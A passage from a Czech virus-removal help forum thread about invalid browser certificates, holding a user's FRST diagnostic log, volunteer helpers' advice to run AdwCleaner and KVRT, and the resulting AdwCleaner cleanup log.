Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Nástroj pro odesílání služby Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Trend Micro Internet Security (HKLM\...\{718D791F-F4E8-4aa7-98A6-15FDED17BDD0}) (Version: 17.50 - Trend Micro Inc.)
Trend Micro Internet Security (HKLM\...\{9D2B0322-44AE-460E-9283-4D2D7A9205AE}) (Version: 17.50 - Trend Micro Inc.) Hidden
USB 2.0 1.3M UVC WebCam (HKLM\...\USB 2.0 1.3M UVC WebCam) (Version: - )
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{4B4451CE-D1E6-4BDE-B4B2-59F03BB83B7C}) (Version: 14.0.8050.1202 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.26.0 - ASUS)
WinRAR 6.02 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{20FDF948-C8ED-4543-A539-F7F4AEF5AFA2}) (Version: 3.0.10 - ASUS)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{041F9391-C79D-44EE-AA4E-AF4E029C4B47}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\PC\AppData\Local\Google\Chrome\Application\94.0.4606.81\notification_helper.exe (Google LLC -> Google LLC) [File not signed]
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-07-03] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2008-10-01 08:02 - 2008-10-01 08:08 - 000011264 _____ () [File not signed] C:\Program Files (x86)\ASUS\Splendid\GLCDdll.dll
2009-10-06 11:31 - 2009-05-07 10:53 - 000379392 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2009-10-06 11:31 - 2009-05-07 10:51 - 000071680 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2009-10-06 11:31 - 2009-07-06 08:37 - 047601664 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2009-10-06 11:31 - 2008-01-18 08:49 - 000098816 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2009-10-06 11:31 - 2007-03-10 03:58 - 000124416 _____ () [File not signed] C:\Program Files\ATKGFNEX\AGFNEX64.dll
2009-05-05 19:00 - 2009-05-05 19:00 - 000041472 _____ () [File not signed] C:\Program Files\P4G\DevMng.dll
2009-07-27 19:12 - 2009-07-27 19:12 - 000026624 _____ () [File not signed] C:\Program Files\P4G\OvrClk.dll
2009-10-06 11:33 - 2009-06-22 22:37 - 000212992 _____ () [File not signed] C:\Windows\SysWOW64\Fast Boot\GetBootTime.dll
2004-05-28 03:13 - 2004-05-28 03:13 - 000080384 _____ (ACTIONTEC Electronics,Inc) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\ATKWLIOC.DLL
2008-06-10 19:35 - 2008-06-10 19:35 - 000049152 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\ATKMETHOD.dll
2005-04-08 06:38 - 2009-07-10 00:43 - 000052736 _____ (ASUSTeK) [File not signed] C:\Program Files (x86)\ASUS\Splendid\Chameleon.dll
2005-06-03 10:39 - 2006-09-12 01:46 - 000035840 _____ (ASUSTek) [File not signed] C:\Program Files (x86)\ASUS\Splendid\OVS.dll
2005-09-22 02:30 - 2005-09-22 02:30 - 000036864 _____ (ATK) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\inter_f2.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 000442712 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\libegl.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 007866200 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\libglesv2.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 004401496 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\vk_swiftshader.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 000733016 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\vulkan-1.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 176138584 _____ (Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\chrome.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 001187672 _____ (Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\chrome_elf.dll
2021-10-25 16:56 - 2021-10-16 03:20 - 004891080 _____ (Microsoft Corporation -> Microsoft Corporation) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\D3DCompiler_47.dll
2009-08-22 11:02 - 2009-08-22 11:02 - 001652736 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Trend Micro\Internet Security\MFC80U.DLL
2005-01-13 09:36 - 2005-01-13 09:36 - 000303104 _____ (Silicon Integrated Systems Corp.) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\SiSPkt.dll
2021-07-05 14:22 - 2021-06-11 11:17 - 000571544 _____ (win.rar GmbH -> Alexander Roshal) [File not signed] C:\Program Files\WinRAR\rarext.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 8) (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//asus.msn.com
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Pomocník pro přihlášení ke službě Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2008-11-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM-x32 - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 78.157.167.7 - 78.157.167.57
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AD1925B9-10F2-4E15-B702-45B687BF9C5D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DDC37A15-CF76-4EE2-AC69-8F450DF3E551}] => (Allow) C:\Windows\system32\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3529A-4DCD-488F-9D52-F549C33A7685}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{A5FEFD13-E490-4420-B2FF-C2591F4D06D4}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{6FAEB1BD-6225-4CA1-88A1-35422AEFDB14}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [TCP Query User{EA50643B-3BA1-42C9-8A94-29A298B813B1}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{4DD63112-DB4B-45D6-B2A8-E15EB604C55D}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [{1E472D29-7705-4C3D-846D-190DB4FA8F87}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) [File not signed]

==================== Restore Points =========================

03-01-2021 19:32:13 Nainstalováno rozhraní DirectX
03-01-2021 19:42:38 Windows Update
05-07-2021 13:55:40 Removed 2007 Microsoft Office system
05-07-2021 14:30:59 Installed Microsoft Office Enterprise 2007

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/26/2021 04:52:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: FRST64.exe, verze: 20.10.2021.0, časové razítko: 0x61703b27
Název chybujícího modulu: FRST64.exe, verze: 20.10.2021.0, časové razítko: 0x61703b27
Kód výjimky: 0xc0000005
Posun chyby: 0x000000000002687a
ID chybujícího procesu: 0x175c
Čas spuštění chybující aplikace: 0x01d7ca7863a1dab1
Cesta k chybující aplikaci: C:\Users\PC\Desktop\FRST64.exe
Cesta k chybujícímu modulu: C:\Users\PC\Desktop\FRST64.exe
ID zprávy: 50bf50ce-366c-11ec-91ac-90e6ba63844b

Error: (10/26/2021 04:42:35 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:33 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.


System errors:
=============
Error: (10/26/2021 05:02:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} se v daném časovém limitu neregistroval u služby DCOM.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:48 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:38:42 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 40.


==================== Memory info ===========================

BIOS: American Megatrends Inc. 212 08/26/2009
Motherboard: ASUSTeK Computer Inc. K50IJ
Processor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentage of memory in use: 85%
Total physical RAM: 4061.09 MB
Available physical RAM: 587.36 MB
Total Virtual: 8120.32 MB
Available Virtual: 788.01 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:149.05 GB) (Free:110.63 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:134.39 GB) (Free:65.13 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Not Active) - (Size=14.6 GB) - (Type=1C)
Partition 2: (Active) - (Size=149 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=134.4 GB) - (Type=0F Extended)

==================== End of Addition.txt =======================

Rudy
Site Admin
Posts: 118199
Joined: 30 Oct 2003 13:42
Location: Plzeň

Re: invalid certificates in browsers

#2 Post by Rudy »

Hello!
Run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/

close all programs
accept the license terms (EULA) by clicking I agree
right-click the AdwCleaner icon and choose Run as administrator (on Win XP simply start it with a double-click)
click Scan now, then Clean and Repair
after the restart a log will pop up (or you can find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!

Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want the thread reactivated, write to me at the e-mail address given above.

JaRon
Moderator
Posts: 15197
Joined: 29 Mar 2005 13:39
Location: BB-SK

Re: invalid certificates in browsers

#3 Post by JaRon »

Hi,
download Avptool Kvrt, restart the PC into safe mode and clean the computer with Kvrt.
FRST |ADWCleaner |MBAM |CCleaner |AVPTool

If you are satisfied, you can support the forum:
https://platba.viry.cz/payment/

Eddydye
Visitor
Posts: 16
Joined: 27 May 2021 16:55

Re: invalid certificates in browsers

#4 Post by Eddydye »

# -------------------------------
# Malwarebytes AdwCleaner 8.3.0.0
# -------------------------------
# Build: 06-29-2021
# Database: 2021-10-26.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 10-26-2021
# Duration: 00:00:15
# OS: Windows 7 Home Premium
# Cleaned: 33
# Failed: 0


***** [ Services ] *****

Deleted Main Service

***** [ Folders ] *****

Deleted C:\Program Files (x86)\MachinerData

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Toolbar|{21FA44EF-376D-4D53-9B0F-8A89D3229068}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted Preinstalled.ASUSControlDeck Folder C:\Program Files (x86)\ASUS\CONTROLDECK
Deleted Preinstalled.ASUSControlDeck Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{169201BA-EF95-4DBA-A040-93D29590C6AF}
Deleted Preinstalled.ASUSControlDeck Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASUSControlDeck
Deleted Preinstalled.ASUSControlDeck Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{5B65EF64-1DFA-414A-8C94-7BB726158E21}
Deleted Preinstalled.ASUSControlDeck Task C:\Windows\System32\Tasks\ASUSCONTROLDECK
Deleted Preinstalled.ASUSFancyStart Folder C:\ASUS.DAT
Deleted Preinstalled.ASUSFancyStart Folder C:\Program Files (x86)\ASUS\FANCYSTART
Deleted Preinstalled.ASUSLiveUpdate Folder C:\Program Files (x86)\ASUS\ASUS LIVE UPDATE
Deleted Preinstalled.ASUSLiveUpdate Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C02341A7-0F42-4050-B91B-7BBE20935F36}
Deleted Preinstalled.ASUSLiveUpdate Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASUS Live Update
Deleted Preinstalled.ASUSLiveUpdate Task C:\Windows\System32\Tasks\ASUS LIVE UPDATE
Deleted Preinstalled.ASUSSplendid Folder C:\Program Files (x86)\ASUS\SPLENDID
Deleted Preinstalled.ASUSSplendid Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9EA161CC-94DA-40D4-AD7B-00389FB1DC3C}
Deleted Preinstalled.ASUSSplendid Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ACMON
Deleted Preinstalled.ASUSSplendid Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{0969AF05-4FF6-4C00-9406-43599238DE0D}
Deleted Preinstalled.ASUSSplendid Task C:\Windows\System32\Tasks\ACMON
Deleted Preinstalled.ASUSVirtualCamera Folder C:\Program Files (x86)\ASUS\VIRTUALCAMERA
Deleted Preinstalled.ASUSVirtualCamera Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}
